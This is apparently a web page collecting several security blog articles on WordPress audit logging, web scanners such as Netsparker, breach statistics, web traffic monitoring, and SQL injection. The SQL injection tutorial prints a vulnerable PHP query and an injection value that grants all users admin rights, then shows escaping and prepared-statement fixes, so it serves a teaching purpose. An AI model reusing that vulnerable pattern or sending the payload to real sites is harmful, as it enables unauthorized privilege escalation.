Monitoring, auditing and obtaining security alerts for websites and blogs based on popular CMS systems such as WordPress have become a necessity. Bugs, security exploits and security holes are continuously being discovered in every WordPress version, making monitoring and auditing a high security priority. In addition, multi-user environments are often used for large WordPress websites, making it equally important to monitor WordPress user activity.

Users with different privileges can login to the website’s admin pages and publish content, install a plugin to add new functionality to the website, or change a WordPress theme to change the look and feel of the website. From the admin pages of WordPress users can do anything, including taking down the website for maintenance, depending on their privileges.

The Need to Keep a Log of What is Happening on Your WordPress

Every type of multi-user software keeps an audit trail that records all user activity on the system. And, since modern business websites have become fully blown multi-user web applications, keeping a WordPress audit trail is a critical, must-do task. A default installation of WordPress does not have an audit trail, but the good news is that there are plugins such as WP Security Audit Log that allow you to keep an audit trail of everything that is happening on your WordPress.

Figure 1. Plugins like WP Security Audit Log provide detailed tracking of all necessary events (click to enlarge)

There are several advantages to keeping track of all the changes that take place on your WordPress website in an audit trail. Here are just a few:

Keep Track Of Content & Functionality Changes On Your WordPress

By keeping a WordPress audit trail you can find out who did what on your WordPress website: for example, who published an article, modified already-published content on an article or page, installed a plugin, changed the theme or modified the source code of a file.


Figure 2. Searching for specific events in WordPress Security Audit Log (click to enlarge)

Be Alerted to Suspicious Activity on Your WordPress

By keeping a WordPress Audit trail you can also be alerted to suspicious activity on your WordPress at an early stage, thus thwarting possible hack attacks. For example, when a WordPress is hacked, typically the attackers reset a user’s password or create a new account to login to WordPress. By using an add-on such as Email Notifications you can create specific rules so when important changes happen on your WordPress they are logged and you are notified via email.

Figure 3. WP Security Audit Log: Creating customized email alerts for your WordPress site

Ensure the Productivity of Your Users & Employees

Nowadays many businesses employ remote workers. As much as businesses benefit from employing remote workers, there are disadvantages. For example, while the activity of employees who work from the office can be easily tracked, that of remote workers cannot. Therefore, if your business website is powered by WordPress, installing a WordPress audit trail plugin lets you keep track of everything your web team is doing on the website, including login and logout times and locations.

Ensure Your Business WordPress Websites Meet Mandatory Regulatory Compliance Requirements

If you have an online business, or if you conduct any sort of business via your WordPress website, there are a number of regulatory compliance requirements your website needs to adhere to, such as PCI DSS. One common requirement across these compliance standards is logging: as a website owner you should keep a log, or audit trail, of all the activity that is happening on your website.

Ease WordPress Troubleshooting

If you already have experience managing a multi-user system, you know that if something breaks down users will never tell you what they did. This is common, especially when administering customers’ websites. The customer has administrative access to WordPress. Someone installs a plugin, the website goes haywire yet it is no one’s fault. By keeping a WordPress audit trail you can refer to it and easily track any website changes that took place, thus making troubleshooting really easy.

Keep A WordPress Audit Trail

There are several other advantages to keeping a WordPress audit trail that records all the changes that take place on your WordPress site, such as the ability to generate reports to justify your charges. The list of advantages can be endless, but the most important one is security. Typically overlooked, logging also helps you ensure the long-term security of your WordPress website.

 


Understanding SQL Injection Attacks & How They Work. Identify SQL Injection Code & PHP Caveats

SQL Injections have been keeping security experts busy for over a decade now, as they continue to be one of the most common types of attacks against webservers, websites and web application servers. In this article, we explain what a SQL injection is, show you SQL injection examples and analyse how these types of attacks manage to exploit web applications and webservers, providing hackers with access to sensitive data.


What Is A SQL Injection?

Websites typically operate with two sides to them: the frontend and the backend. The frontend is the element we see, the rendered HTML, images, and so forth. On the backend, however, there are layers upon layers of systems rendering the elements for the frontend. One such layer, the database, most commonly uses a database language called SQL, or Structured Query Language. This standardized language provides a logical, human-readable sentence to perform definition, manipulation, or control instructions on relational data in tabular form. The problem, however, is that while this provides a structure for human readability, it also opens up a major problem for security.

Typically, when data is provided from the frontend to the backend of a website – e.g. an HTML form with username and password fields – this data is inserted into the sentence of a SQL query. Rather than assigning that data to some object or passing it via a set() function, the data has to be concatenated into the middle of a string. Just as if you were printing out a concatenated string of debug text and a variable’s value, SQL queries work in much the same way. The problem is that the database server, such as MySQL or PostgreSQL, must be able to lexically analyse and understand the sentence’s grammar and parse variable=value definitions, so certain specific requirements must be met, such as wrapping string values in quotes. A SQL injection vulnerability, therefore, is where unsanitized frontend data, such as quotation marks, can disrupt the intended sentence of a SQL query.

How Does A SQL Injection Work?

So what does “disrupt the intended sentence of a SQL query” mean? A SQL query reads like an English sentence:

Take variable foo and set it to ‘bar’ in table foobar.
Notice the single-quotes around the intended value, bar. But if we take that value, add a single quote and some additional text, we can disrupt the intended sentence, creating two sentences that change the entire effect. So long as the database server can lexically understand the sentence, it is none the wiser and will happily complete its task.  So what would this look like?

If we take that value bar and change it to something more complex – bar’ in table foobar. Delete all values not equal to ‘ – it completely disrupts everything. The sentence is thus changed as follows:

Take variable foo and set it to ‘bar’ in table foobar. Delete all values not equal to ‘’ in table foobar.

Notice how dramatically this disrupts the intended sentence? By injecting additional information, including syntax, into the sentence, the entire intended function and result has been disrupted to effectively delete everything in the table, rather than just change a value.

What Does A SQL Injection Look Like?

In code form, a SQL injection can find itself in effectively any place a SQL query can be altered by the user of a web application. This means things like query strings e.g: example.com/?this=query_string, form content (such as a comments section on a blog or even a username & password input fields on a login page), cookie values, HTTP headers (e.g. X-FORWARDED-FOR), or practically anything else.  For this example, consider a simple query string in PHP:

Request URI: /?username=admin
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

First, we will break this down a bit.

On line #1, we set the value of the username field in the query string to the variable $user.

On line #2, we insert that variable’s value into the SQL query’s sentence. Substituting the variable with the value admin from the URI, the database query would ultimately be parsed as follows by MySQL:

UPDATE tbl_users SET admin=1 WHERE username='admin'

However, a lack of basic sanitization opens this query string up to serious consequences. All an attacker must do is put a single quote character in the username query string field in order to alter this sentence and inject whatever additional data he or she would like.

Here is an example of what this would look like:

Request URI: /?username=admin' OR 'a'='a
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

Now, with this altered data, here is what MySQL would see and attempt to evaluate:

UPDATE tbl_users SET admin=1 WHERE username='admin' OR 'a'='a'

Notice, now, that if the letter A equals the letter A (basically true=true), all users will be set to admin status.

Ensuring Code is Not Vulnerable to SQL Injection Vulnerabilities

If we were to add a function, mysql_real_escape_string() for example, on line #1, that would prevent this particular variable from being vulnerable to a SQL injection. In practice, it would look like this:

Request URI: /?username=admin' OR 'a'='a
 
1.  $user = mysql_real_escape_string($_GET['username']);
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

This function escapes certain characters dangerous to MySQL queries, by prefixing those characters with backslashes. Rather than evaluate the single quote character literally, MySQL understands this prefixing backslash to mean do not evaluate the single quote. Instead, MySQL treats it as part of the whole value and keeps going.  The string, to MySQL, would therefore look like this:


UPDATE tbl_users SET admin=1 WHERE username='admin\' OR \'a\'=\'a'

Because each single quote is escaped, MySQL considers it part of the whole username value, rather than evaluating it as multiple components of the SQL syntax. The SQL injection is thus avoided, and the intention of the SQL sentence is thus undisrupted.

Caveat: For these examples, we used older, deprecated functions like mysql_query() and mysql_real_escape_string() for two reasons:

1.    Most PHP code still actively running on websites uses these deprecated functions;
2.    It allows us to provide simple examples easier for users to understand.

However, the right way to do it is to use prepared SQL statements. For example, the prepare() functions of the MySQLi and PDO_MySQL PHP extensions allow you to format and assemble a SQL statement using directive symbols very much like a sprintf() function does. This prevents any possibility of user input injecting additional SQL syntax into a database query, as all input provided during the execution phase of a prepared statement is sanitized.  Of course, this all assumes you are using PHP, but the idea still applies to any other web language.
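
For completeness, here is a minimal sketch of the earlier example rewritten with a PDO prepared statement; the connection details are placeholders:

<?php
// Placeholder connection details; adjust for your own database
$pdo = new PDO('mysql:host=localhost;dbname=app', 'db_user', 'db_pass');

// The :username placeholder is bound separately, so user input can never alter the SQL syntax
$stmt = $pdo->prepare("UPDATE tbl_users SET admin=1 WHERE username = :username");
$stmt->execute(array(':username' => $_GET['username']));

Even if an attacker submits admin' OR 'a'='a, the whole string is treated as a literal username value rather than as additional SQL.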

SQL Injection Is The Most Widely Exploited Vulnerability

Even though it has been more than sixteen years since the first documented attack of SQL Injection, it is still a very popular vulnerability with attackers and is widely exploited. In fact SQL Injection has always topped the OWASP Top 10 list of most exploited vulnerabilities.


Web Application Security Interview on Security Weekly – Importance of Automated Web Application Security

netsparker-importance-of-automated-web-application-scannerA few weeks back Security Weekly interviewed Ferruh Mavituna, Netsparker’s CEO and Product Architect. Security Weekly is a popular podcast that provides free content within the subject matter of IT security news, vulnerabilities, hacking, and research and frequently interviews industry leaders such as John Mcafee, Jack Daniel and Bruce Schneier.

During the 30-minute interview, Security Weekly’s host Paul Asadoorian and Ferruh Mavituna highlight how important it is to use an automated web application security scanner to find vulnerabilities in websites and web applications. They also briefly discuss web application firewalls and their effectiveness, and how Netsparker is helping organizations improve their post-scan process of fixing vulnerabilities with their online web application security scanner, Netsparker Cloud.

Paul and Ferruh covered several other aspects of web application security during this interview, so whether you are a seasoned security professional, a developer or a newbie, it is a recommended watch.

To view the interview, click on the image below:

netsparker-ceo-interview-importance-of-automated-web-application-scanner
Figure 1. Netsparker CEO explains the importance of automated web application security scanners


WordPress DOM XSS Cross-site Scripting Vulnerability Identified By Netsparker

On the 18th of May 2015, Netsparker announced the discovery of a critical security vulnerability in an HTML file found in many WordPress themes, including those used on WordPress.org hosted websites. As reported by Netsparker, the specific HTML file is vulnerable to cross-site scripting attacks and session hijacking. WordPress.org has already issued an official announcement and patch (v4.2.2) and recommends WordPress administrators update their website files and themes.

The Genericons icon font package, which is used in a number of popular themes and plugins, contained an HTML file vulnerable to a cross-site scripting attack. All affected themes and plugins hosted on WordPress.org (including the Twenty Fifteen default theme) have been updated yesterday by the WordPress security team to address this issue by removing this nonessential file. To help protect other Genericons usage, WordPress 4.2.2 proactively scans the wp-content directory for this HTML file and removes it. Reported by Robert Abela of Netsparker.

By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in Netsparker's article, if a web application is vulnerable to cross-site scripting and the administrator’s session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application.



Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools

In the world of information security there exist many tools, from small open source products to full appliances, to secure a system, a network, or an entire corporate infrastructure.  Of course, everyone is familiar with the concept of a firewall – even movies like Swordfish and TV shows like NCIS have so very perfectly described, in riveting detail, what a firewall is.  But there are other, perhaps less sexy utilities in a security paradigm.

Various concepts and security practices – such as using complex passphrases, or eschewing passphrases entirely, deeply vetting email sources, safe surfing habits, etc. – are increasingly common among the general workforce at large, especially with the ubiquity of computers at every desk.  But security in general is still unfortunately looked at as an afterthought, even when a lack thereof begets massive financial loss on a seemingly daily basis.

Security engineers are all too often considered an unnecessary asset, simply a menial role anybody can do; a role that can be assumed as yet another hat worn by developers, system administrators, or, well, perhaps just someone who only shows a modest capability with Excel formulas.  Whatever the reason for such a decision, be it financial or otherwise, the consequences can be severe and long-lasting.  Sony underestimated the value of a strong and well-equipped security team multiple times, choosing to forego a powerful army in lieu of a smaller, less outfitted and, thus, thinner-stretched but cheaper alternative.  This, in turn, yielded some of the largest security breaches ever seen, especially by a single corporation.  Were their security department better outfitted with the right tools, it is quite possible those events would have played out entirely differently.

Using The Right Security Tools

So, what constitutes “the right tools”?  Many things.  A well-populated team of capable security engineers certainly can be considered a valuable tool in building a strong security posture within an infrastructure.  But, more specifically and very critically, it is what assets those engineers have at their disposal that may mean the difference between a minor event that never even makes it outside the corporate headquarters doors, and a major event that results in a corporation paying for identity theft protection for millions of customers.  Those tools of course vary widely depending on the organization, but one common element they all do – or at least absolutely should – share is a web application security scanner.

What Is A Web Application Security Scanner?

A website that accepts user input in any form, be it URL values or submitted content, is a complex beast.  Not only does the content an end user provides change the dynamics of the website, but it even has the potential to cripple that website if done maliciously and left unprotected against.  For every form of user content, the number of potential attack vectors increases enormously.  It is practically impossible for a security engineer, or even a team thereof, to account for all these possibilities by hand and, especially, to test them for known or unknown vulnerabilities.

Web scanners exist for this very purpose, designed carefully to predict potential and common methods of attack, then brute-force test them to find any possibility of an existing vulnerability.  And they do this at a speed impossible for humans to replicate manually.  This is crucial for many reasons, namely that it saves time, it is thorough and comprehensive, and, if designed well, adaptive and predictive to attempt clever methods that even the most skilled security engineer may not immediately think of.  Truly, not using a web security scanner is only inviting potentially irreparable harm to a web application and even the company behind it.  But the question remains: Which web scanner works the best?

Options Galore - How To Choose Which Web Scanner Is Right For You

Many websites and web applications are like human fingerprints, with no two being alike.  Of course, many websites may use a common backend engine – Wordpress, an MVC framework like Laravel or Ruby on Rails, etc. – but the layers on top of those engines, such as plugins or custom-coded additions, are often a quite unique collection.

The backend engine is also not the only portion to be concerned with.  Frontend vulnerabilities may exist in each of these layers, such as cross-site scripting, insecurely implemented jQuery libraries and add-ons, poor sanitization of AJAX communication, and many more.  Each layer presents another nearly endless array of input possibilities to test for vulnerabilities.

A web scanner needs to be capable of digging through these unique complexities and providing accurate, reliable findings.  False positives can waste an engineer’s time or, worse, send a development team on a useless chase, writing unit tests and hunting for a falsely detected vulnerability.  And if the scanner is difficult to understand or provides little insight into the detected vulnerabilities, it makes for a challenging or undesirable utility that may go unused.  Indeed, a well-designed web security scanner that delivers on all fronts is an important necessity for a strong security posture and a better secured infrastructure.

Final Thoughts

There is no one perfect solution that will solve all problems and completely secure your website such that it becomes impenetrable.  Further, a web security scanner will only be as effective as the security engineers or developers fixing all flaws it finds.  A web security scanner is only the first of many, many steps, but it indeed is an absolutely critical one for a powerful security posture.

Indeed, we keep returning to that phrase – security posture – because it is a perfectly analogous way to look at web application, system, and infrastructure security for both what it provides and what is required for good posture: a strong backbone.  Focused visibility and a clear view of paths over obstructions is not possible with a slouched posture.  Nothing will provide that vision as clearly as a web security scanner will, and no backbone is complete without a competent and useful web security scanning solution at its top.


Comparing Netsparker Cloud-based and Desktop-based Security Software solutions – Which solution is best for you?

If you are reading this you have heard about Cloud Computing. If not, I would be worried! Terms such as Cloud Computing, Software as a Service and Cloud Storage have become a permanent fixture in adverts, marketing content and technical documentation.

Many Windows desktop software applications have moved to the “cloud”. Yet even though the whole industry wants you and your data in the cloud, have you ever looked into the pros and cons of the cloud? Does it make sense to go in that direction?

Let’s use web application security scanners as an example: software that is used to automatically identify vulnerabilities and security flaws in websites and web applications. Most, if not all, of the industry-leading vendors have both a desktop edition and an online service offering. In fact, Netsparker just launched their all-new service offering, Netsparker Cloud, the online false-positive-free web application security scanner. In such a case, which one should you go for?

As clearly explained in Netsparker Desktop VS Netsparker Cloud both web security solutions are built around the same scanning engine, hence their vulnerability detection capabilities are the same. The main differences between both of them are the other non-scan related features, which also define the scope of the solution.

Figure 1. Netsparker Cloud-based Security Scanner (Click to enlarge)

For example Netsparker Desktop is ideal for small teams, or security professionals who work on their own and have a small to medium workload. On the other hand Netsparker Cloud is specifically designed for organizations which run and manage a good number of websites and maybe even have their own team of developers and security professionals. It is a multi–user platform, has a vulnerability tracking solution (a system that is similar to a normal bug tracking solution but specifically designed for web application vulnerabilities) and it is fully scalable, to accommodate the simultaneous scanning of hundreds and thousands of web applications.

Figure 2. Netsparker Desktop-based Security Scanner (Click to enlarge)

Do not just follow the trend; inform yourself. Yes, your reading might be flooded with cloud-related terms and the industry is pushing you to move your operations to the cloud because it is cheaper and more reliable, but as clearly explained in the desktop vs cloud web scanner comparison, both solutions still have a place in today’s industry.


The Importance of Automating Web Application Security Testing & Penetration Testing

Have you ever tried to make a list of all the attack surfaces you need to secure on your networks and web farms? Try it and one thing will stand out: keeping websites and web applications secure. We have firewalls, IDS and IPS systems that inspect every packet that reaches our servers and are able to drop it should it be flagged as malicious, but what about web applications?

Web application security is different from network security. When configuring a firewall you control who accesses what, but when it comes to web application security you have to allow everybody in, including the bad guys, and expect that everyone plays by the rules. Hence web application security should be given much more attention and, considering the complexity of today’s web applications, it should be automated.

Let’s dig deep into this subject and see why it needs to be automated.

Automated Web Security Testing Saves Time

Also known as Penetration Testing or “pen testing”, this is the process by which a security engineer or “pen tester” applies a series of injection or vulnerability tests against areas of a website that accept user input to find potential exploits and alert the website owner before they get taken advantage of and become massive headaches or even financial losses. Common places for this can include user data submission areas such as authentication forms, comments sections, user viewing configuration options (like layout selections), and anywhere else that accepts input from the user. This can also include the URL itself, which may have a Search Engine Optimization-friendly URI formatting system.

Most MVC frameworks or web application suites like WordPress offer this type of URI routing. (We differentiate a URL and URI. A URL is the entire address, including the http:// portion, the entire domain, and everything thereafter; whereas the URI is the portion starting usually after the domain (but sometimes including, for context), such as /user/view/123 or test.com/articles/123.)

For example, your framework may take a URI style as test.com/system/function/data1/data2/, where system is the controlling system you wish to invoke (such as an articles system), function is the action you wish to invoke (such as read or edit), and the rest are data values, typically in assumed positions (such as year/month/article-title).

Each of these individual values requires a specific data type, such as a string, an integer, a certain regular expression match, or infinite other possibilities. If data types are not strictly enforced, or – as sadly often happens – user-submitted data is not properly sanitized, then a hacker can potentially gain information to get further access, if not force direct backdoor access via a SQL injection or a remote file inclusion. Such vulnerabilities are such a prevalent and consistent threat that, for example, SQL Injection has been on the OWASP Top 10 list for over 14 years.
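
As a small, hypothetical illustration of enforcing data types on URI segments in PHP (the route layout and patterns below are made up for this sketch):

<?php
// e.g. Request URI: /articles/read/2015/06/my-article-title
$segments = explode('/', trim($_SERVER['REQUEST_URI'], '/'));

// Enforce the expected type of each segment before it is ever used in a query
$year  = isset($segments[2]) && ctype_digit($segments[2]) ? (int) $segments[2] : null;
$month = isset($segments[3]) && ctype_digit($segments[3]) ? (int) $segments[3] : null;
$slug  = isset($segments[4]) && preg_match('/^[a-z0-9-]+$/', $segments[4]) ? $segments[4] : null;

if ($year === null || $month === null || $slug === null) {
    http_response_code(404);   // anything that does not match the expected format is rejected
    exit;
}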

There exist potentially millions, billions, or more combinations of various URIs in your web application, including ones it may not support by default or even to your knowledge. There could be random phpinfo(); scripts publicly accessible that mistakenly got left in by a developer, an unchecked user input somewhere, some file upload system that does not properly prevent script execution – any number of possibilities. No security engineer or team can reasonably account for or test all of these possibilities by hand. And black-hat hackers know all this too, sometimes better than those tasked to protect against these threats.

Automation Isn’t Just Used By The Good Guys

Many automated security tools exist not to test and find security holes, but to exploit them when found. Black-hat hackers intent on disrupting your web application possess automated suites as well, because they, too, know a manual approach is a waste of time (that is, until they find a useful exploit, and by then it’s sometimes too late).

Some utilities, like Slowloris, exist to exploit known weaknesses in common web services, like the Apache web server itself. Others prey on finding opportunity in the form of insecure common web applications – older versions of Wordpress, phpBB, phpMyAdmin, cPanel, or other frequently exploited web applications. There exist dozens of categories of vulnerabilities, each with thousands or millions of attack variants. Looking for these is a daunting task.

As quickly as you can spin up a web application, a hacker can automatically scan it and possibly find vulnerabilities. Leveraging an automated web application vulnerability scanner like Netsparker or Netsparker Cloud provides you the agility and proactivity to find and prevent threats before they become seriously damaging problems. This holds especially true for complex web applications such as large forum systems, blogging platforms and custom web applications. The more possibility for user submitted data and functionality, the more opportunity for vulnerabilities to exist and be exploited. And remember, this changes again for every new version of the web application you install. A daunting task, indeed.

Without automation of web application security testing, a true strong security posture is impossible to achieve. Of course, many other layers ultimately exist – least-privilege practice, segregated (jail, chroot, virtual machine) systems, firewalls, etc. – but if the front door is not secure, what does it matter if the walls are impenetrable? With the speed afforded by automation, a strong and capable web vulnerability scanner, and of course patching found flaws and risks, security testing guarantees as best as reasonably possible that the front door to your web application and underlying infrastructure remains reinforced and secure.


Statistics Highlight the State of Security of Web Applications - Many Still Vulnerable to Hacker Attacks

Netsparker use open source web applications such as Twiki for a totally different purpose than the one they were intended for: they use them to test their own web application security scanners.

Netsparker need to ensure that their scanners are able to crawl and identify attack surfaces on all sorts of web applications, and identify as many vulnerabilities as possible. Hence they frequently scan open source web applications, using them as a test bed for their crawling and scanning engine.

Thanks to this exercise Netsparker are also helping developers ship more secure code, since they report their findings to the developers and sometimes also help them remediate the issues. When such web application vulnerabilities are identified Netsparker release an advisory; between 2011 and 2014 they published 87 advisories.


A few days ago Netsparker released some statistics about the 87 advisories they published so far. As a quick overview, from these statistics we can see that cross-site scripting is the most common vulnerability in the open source web applications that were scanned. Is it a coincidence? Not really.

The article also explains why so many web applications are most probably vulnerable to this issue, which has featured in the OWASP Top 10 list ever since the list was introduced.

The conclusion we can draw from these statistics is predictable, but at the same time shocking: there is still a very long way to go in web application security. Web applications are still poorly coded, making them an easy target for malicious hacker attacks.


The Implications of Unsecure Webservers & Websites for Organizations & Businesses

Long gone are the days when a simple port scan on a company’s webserver or website was considered enough to identify security issues and exploits that needed to be patched. With all the recent attacks on websites and webservers, which caused millions of dollars in damage, we thought it would be a great idea to analyze the implications vulnerable webservers and websites have for companies, while providing useful information to help IT departments, security engineers and application developers proactively avoid unwanted situations.

Unfortunately, companies and webmasters often turn their attention to their webservers and websites only after the damage is done, at which point the cost is always greater than that of any proactive measures that could have been taken to avoid the situation.

Most Security Breaches Could Have Been Easily Prevented

Without doubt, corporate websites and webservers are amongst the highest preference for hackers. Exploiting well-known vulnerabilities provides them with easy-access to databases that contain sensitive information such as usernames, passwords, email addresses, credit & debit card numbers, social security numbers and much more.

The sad part of this story is that in most cases, hackers made use of old exploits and vulnerabilities to scan their targets and eventually gain unauthorized access to their systems.

Most security experts agree that if companies proactively scanned and tested their systems using well-known web application security scanner tools, e.g. Netsparker, most of these security breaches could have been easily avoided. The Online Trust Alliance (OTA) confirms this: it analyzed thousands of security breaches that occurred in the first half of 2014 and concluded that they could have been easily prevented. [Source: OTA Website]

Tools such as Web Application Vulnerability Scanners are used by security professionals to automatically scan websites and web applications for hidden vulnerabilities.

When reading through recent security breaches, we can slowly begin to understand the implications and disastrous effects these had for companies and customers. Quite often, the number of affected users whose information was compromised was in the millions. We should also keep in mind that in many cases, the true magnitude of such a security incident is very rarely made known to the public.

Below are a few of the biggest security data breaches which exposed an unbelievable amount of information to hackers:

 eBay.com – 145 Million Compromised Accounts

In late February – early March 2014, the eBay database that held customer names, encrypted passwords, email addresses, physical addresses, phone numbers, dates of birth and other personal information was compromised, exposing sensitive information to hackers. [Source: bgr.com website]

JPMorgan Chase Bank – 76 Million Household Accounts & 7 Million Small Business

In June 2014, JPMorgan Chase bank was hit badly and had sensitive personal and financial data exposed for over 80 million accounts. The hackers appeared to obtain a list of the applications and programs that run on the company’s computers and then crosschecked them against known vulnerabilities for each program and web application in order to find an entry point into the bank’s systems.
[Source: nytimes.com website]

Find the security holes on your websites and fix them before hackers do, by scanning your websites and web applications with a Web Application Security Scanner.

Forbes.com – 1 Million User Accounts

In February 2014, the Forbes.com website succumbed to an attack that leaked over 1 million user accounts containing email addresses, passwords and more. The Forbes.com WordPress-based backend site was defaced with a number of news posts. [Source: cnet.com website]

Snapchat.com – 4.6 Million Username Accounts & Phone numbers

In January 2014, Snapchat’s popular website had over 4.6 million usernames and phone numbers exposed due to a brute force enumeration attack against the Snapchat API. The information was publicly posted on several other sites, creating a major security concern for Snapchat and its users.
[Source: cnbc.com website]

USA Businesses: Nasdaq, 7-Eleven and others – 160 Million Credit & Debit Cards

In 2013 a massive underground attack was uncovered, revealing that over 160 million credit and debit cards had been stolen over the previous seven years. Five Russians and Ukrainians used advanced hacking techniques to steal the information during those years. The attackers targeted over 800,000 bank accounts and penetrated servers used by the Nasdaq stock exchange.
[Source: nydailynews.com website]

AT&T - 114,000 iPad Owners (Includes White House Officers, US Senate & Military Officials)

In 2010, a major security breach on AT&T’s website compromised over 114,000 customer accounts, revealing names, email addresses and other information. AT&T acknowledged the attack on its webservers and commented that the risk was limited to the subscribers’ email addresses.
Amongst the list were apparently officials from the White House, members of the US Senate, and staff from NASA, the New York Times, Viacom and Time Warner, as well as bankers and many more. [Source: theguardian.com website]

Target  - 98 Million Credit & Debit Cards Stolen

In 2013, between the 27th of November and the 15th of December, more than 98 million credit and debit card accounts were stolen from 1,787 Target stores across the United States. Hackers managed to install malware on Target’s computer systems to capture customers’ cards and then installed exfiltration malware to move the stolen credit card numbers to staging points around the United States in order to cover their tracks. The information was then moved to the hackers’ computers located in Russia.

The odd part of this security breach is that the infiltration was actually caught by FireEye – the $1.6 million malware detection tool purchased by Target. However, according to online sources, when the alarm was raised with the security team in Minneapolis, no action was taken, and 40 million credit card numbers and 70 million addresses, phone numbers and other records were pulled out of Target’s mainframes! [Source: Bloomberg website]

SQL Injection & Cross-Site Scripting are among the most popular attack methods against websites and web applications. Security tools such as Web Vulnerability Scanners allow us to uncover these vulnerabilities and fix them before hackers exploit them.

Implications for Organizations & Businesses

It goes without saying that organizations suffer major damages and losses when it comes to security breaches. When a security breach affects millions of users, as in the above examples, it is almost impossible to calculate an exact dollar ($) figure.

Security Experts agree that data security breaches are among the biggest challenges organizations face today as the problem has both financial and legal implications.

Business loss is the biggest contributor to overall data breach costs, because it breaks down into a number of sub-categories, the most important of which are outlined below:

  • Detection of the data breach. Depending on the type of security breach, the business can lose substantial amounts of money until the breach is successfully detected. Common examples are a defaced website, customer orders and credit card information being redirected to hackers, and orders being manipulated or declined.
  • Escalation Costs. Once the security breach has been identified, emergency security measures are usually put into action. This typically involves bringing in Internet security specialists, the cybercrime unit (police) and other forces, to help identify the source of the attack and damage it has caused. Data backups are checked for their integrity and everyone is on high-alert.
  • Notification Costs. Customers and users must be notified as soon as possible. Email alerts, phone calls and other means are used to get in contact with the customers and request them to change passwords, details and other sensitive information. The company might also need to put together a special team that will track and monitor customer responses and reactions.
  • Customer Attrition. Also known as customer defection. After a serious incident involving sensitive customer data being exposed, customers are more likely to stop purchasing and using the company’s services. Initially gaining a customer’s trust requires sacrifices and hard work – trying to regain it after such an incident means even more sacrifices and significantly greater cost. In many cases, customers choose never to deal with the company again, costing it thousands or millions of dollars.
  • Legal Implications. In many cases, customers have turned against companies after their personal information was exposed by a security breach. Legal action against companies is usually followed by lengthy lawsuits which end up costing thousands of dollars, not to mention any financial compensation awarded to the affected customers. One example is Target, whose security breach mentioned previously has resulted in multiple lawsuits from customers.

As outlined previously, the risk for organizations is high and there is a lot at stake from both a financial and a legal perspective. The security breach examples mentioned in this article illustrate how big and serious a breach can become, as well as its implications for companies and customers. Our next article will focus on guidelines that can help prevent data breaches and help our organization, company or business deal with them.


The Importance of Monitoring and Controlling Web Traffic in Enterprise & SMB Networks - Protecting from Malicious Websites - Part 1

This article expands on our popular security articles (Part 1 & Part 2) that covered the importance of patching enterprise and SMB network systems to protect them from hijacking, hacking attempts, unauthorized access to sensitive data and more. While patching systems is essential, another equally important step is the monitoring of Web traffic to control user activity on the web and prevent users from accessing dangerous sites and Internet resources that could jeopardize the company’s security.

The ancient maxim – prevention is better than cure – holds good in cyberspace as well, and it is prudent to detect beforehand signs of trouble which, if allowed to continue, might snowball into something uncontrollable. One of the best means of such prevention is monitoring web traffic to locate potential sources of trouble.

Even if attackers are unable to gain access to your network, they can still hold you to ransom by launching a Distributed Denial of Service or DDoS attack, wherein they choke the bandwidth of your network. Regular customers will not be able to gain access to your servers, and downtime for any company these days translates to loss of income and damage to the company’s reputation. Attackers might also refuse to relent until a ransom amount is paid up. Sounds a bit too far-fetched? Not really.

Live Attacks & Hacking Attempts On The Internet

It’s hard to imagine what is really happening right now on the Internet: how many attacks are taking place, the magnitude of these attacks, the services used to launch them, attack origins, attack targets and much more. Hopefully we’ll be able to change that for you right now…

The screenshot below was taken after monitoring the Norse network which collects and analyzes live threat intelligence from darknets in hundreds of locations in over 40 countries. The attacks are taken from a small subset of live flows against the Norse honeypot infrastructure and represent actual worldwide cyber-attacks:


In around 15 minutes of monitoring attacks, we saw more than 5000 different origins launching attacks against over 5800 targets; 99% of the targets were located in the United States and 50% of the attack origins were in China.

The sad truth is that the majority of these attacks are initiated from compromised computer systems and servers with unrestricted web access. All it takes today is for one system to visit an infected site, and that could be enough to bring down the whole enterprise network infrastructure while at the same time launching a massive attack against Internet targets.

In June 2014, Evernote and Feedly, which work largely in tandem, went down under a DDoS attack within two days of each other. Evernote recovered the same day, but Feedly suffered more. Although there were two further DDoS attacks on Feedly that caused it to lose business for another two days, normalcy was finally restored. According to the CEO of Feedly, they refused to give in to the demands of ransom in exchange for ending the attack and were successful in neutralizing the threat.

Domino's Pizza had over 600,000 Belgian and French customer records stolen by the hacking group Rex Mundi. The attackers demanded $40,000 from the fast food chain in exchange for not publishing the data online. It is not clear whether Domino's complied with the ransom demands; however, they reassured their customers that although the attackers did have their names, addresses and phone numbers, they were unsuccessful in stealing their financial and banking information. The Twitter account of the hacking group was suspended, and they never released the information.

Apart from external attacks, misbehavior from employees can cause equal if not greater damage. Employees viewing pornographic material in the workplace can lead to a huge number of issues. Not only is porn one of the biggest time wasters, it chokes up the network bandwidth with non-productive downloads and brings in unwanted viruses, malware and Trojans. Co-workers unwillingly exposed to offensive images can find the workplace uncomfortable, and this may further lead to charges of sexual harassment, dismissal and lawsuits, all expensive and disruptive.

Another major problem is data leakage via e-mail or webmail, whether intended or accidental. Client data, unreleased financial data and confidential plans leaked through emails may have a devastating impact on the business, including loss of client confidence.

Web monitoring provides answers to several of these problems. This type of monitoring need not be very intrusive or onerous, but with the right policies and training, employees easily learn to differentiate between appropriate and inappropriate use.

Few Of The Biggest Web Problems

To monitor the web, you must know the issues that you need to focus on. Although organizations differ in their values, policies and culture, there are some common major issues on the Web that cause the biggest headaches:

  • Torrents And Peer-To-Peer Networks offer free software, chat, music and video, which can be easily downloaded. However, this can hog the bandwidth, causing disruption to operations such as video conferencing and VoIP. Moreover, such sites also contain pirated software, bootlegged movies and inappropriate content that are mostly tainted with various types of viruses and Trojans.
  • Gaming sites are notorious for hogging bandwidth and wasting productive time. Employees often find these sites hard to resist and download games. Many of the games carry lethal payloads of viruses and other malware, and hackers find them a common vehicle for SEO poisoning. Even when safe, games disrupt productivity and clog the network.
  • Fun sites, although providing a harmless means of relieving stress, may be offensive and inappropriate to coworkers. Whether or not your policies allow such humor sites, they can contain SEO-poisoned links and Trojans, and often clog networks with their video components.
